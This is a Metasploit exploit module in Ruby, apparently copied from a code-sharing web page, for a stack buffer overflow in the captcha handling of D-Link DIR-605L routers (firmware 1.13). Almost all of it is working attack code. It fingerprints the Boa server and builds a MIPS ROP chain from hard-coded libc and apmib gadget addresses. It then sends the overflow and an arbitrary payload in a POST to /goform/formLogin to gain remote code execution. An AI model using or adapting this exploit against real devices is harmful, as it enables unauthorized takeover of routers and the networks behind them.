扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # Because only has been tested on a QEMU emulated environment HttpFingerprint = { :pattern => [ /Boa/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link DIR-605L Captcha Handling Buffer Overflow', 'Description'=> %q{ This module exploits an anonymous remote code execution on D-Link DIR-605L routers. The vulnerability exists while handling user supplied captcha information, and is due to the insecure usage of sprintf on the getAuthCode() function. This module has been tested successfully on DLink DIR-605L Firmware 1.13 under a QEMU environment. }, 'Author' => [ 'Craig Heffner', # Vulnerability discovery, original exploit 'juan vazquez' # Metasploit module ], 'License'=> MSF_LICENSE, 'Payload'=> { 'DisableNops' => true, 'Space' => 3000, 'BadChars'=> "\x00\x67\x26\x2b" }, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSBE, 'References' => [ [ 'OSVDB', '86824' ], [ 'URL', 'http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/' ] ], 'Targets'=> [ [ 'DLink DIR-605L 1.13', { 'Offset'=> 94, 'LibcBase'=> 0x2ab86000, # According to Original Exploit by Craig Heffner 'ApmibBase' => 0x2aaef000, # According to Original Exploit by Craig Heffner #'LibcBase'=> 0x4212e000, # QEMU environment #'ApmibBase' => 0x42095000, # QEMU environment #LOAD:000248D4li$a0, 1 ; set $a0 for the sleep() call #LOAD:000248D8move$t9, $s1 ; $s1 is controlled after the overflow #LOAD:000248DCjalr$t9 'Ret' => 0x248D4, # from libc #LOAD:0002B954move$t9, $s2 # Controlled #LOAD:0002B958lw$ra, 0x30+var_4($sp)# allows to get controlled $ra from the stack #LOAD:0002B95Clw$s4, 0x30+var_8($sp) #LOAD:0002B960lw$s3, 0x30+var_C($sp) #LOAD:0002B964lw$s2, 0x30+var_10($sp) #LOAD:0002B968lw$s1, 0x30+var_14($sp) # allows to get controlled $s1 from the stack #LOAD:0002B96Clw$s0, 0x30+var_18($sp) #LOAD:0002B970jr$t9 'RopJmpSleep' => 0x2B954, # from libc 'RopSleep'=> 0x23D30, # from libc # Sleep Function Address # sleep() to flush the data cache #LOAD:000027E8move$t9, $s1 # Controlled #LOAD:000027ECjalr$t9 ; sub_22D0 #LOAD:000027F0addiu $a2, $sp, 0x40+var_24 ; put pointer to the stack on $a2 # executed because of pipelining 'RopPtrStack' => 0x027E8, # from apmi #LOAD:00001D78move$t9, $a2 ; $a2 contains a poiner to the stack #LOAD:00001D7Cjalr$t9 'RopJmpStack' => 0x01D78 # from apmi } ] ], 'DisclosureDate' => 'Oct 08 2012', 'DefaultTarget' => 0)) end def check res = send_request_cgi({ 'uri' => '/comm.asp' }) if res and res.code == 200 and res.body =~ /var modelname="DIR-605L"/ and res.headers["Server"] and res.headers["Server"] =~ /Boa\/0\.94\.14rc21/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit shellcode = "" shellcode << rand_text(target['Offset']) # Padding shellcode << rand_text(4)# $s0 shellcode << [target['LibcBase'] + target['RopJmpSleep']].pack("N")# $s1 shellcode << [target['LibcBase'] + target['RopSleep']].pack("N") # $s2 shellcode << rand_text(4)# $s3 shellcode << [target['LibcBase'] + target.ret].pack("N") # $ra shellcode << rand_text(0x1c) # filler shellcode << rand_text(4)# $s0 shellcode << [target['ApmibBase'] + target['RopJmpStack']].pack("N") # $s1 shellcode << rand_text(4)# $s2 shellcode << rand_text(4)# $s3 shellcode << rand_text(4)# $s4 shellcode << [target['ApmibBase'] + target['RopPtrStack']].pack("N") # $ra shellcode << rand_text(0x1c) # filler shellcode << payload.encoded # shellcode print_status("#{peer} - Sending exploit...") send_request_cgi({ 'method' => 'POST', 'uri' => "/goform/formLogin", 'encode_params' => false, 'vars_post' => { 'VERIFICATION_CODE' => 'myvoiceismypassportverifyme', 'VER_CODE'=> '1234', 'login_n' => 'admin', 'FILECODE'=>shellcode, 'curTime' => '1348588030496', 'login_pass'=> 'Zm9vb255b3UA', 'login_name'=> 'admin' } }) end end |
体验盒子
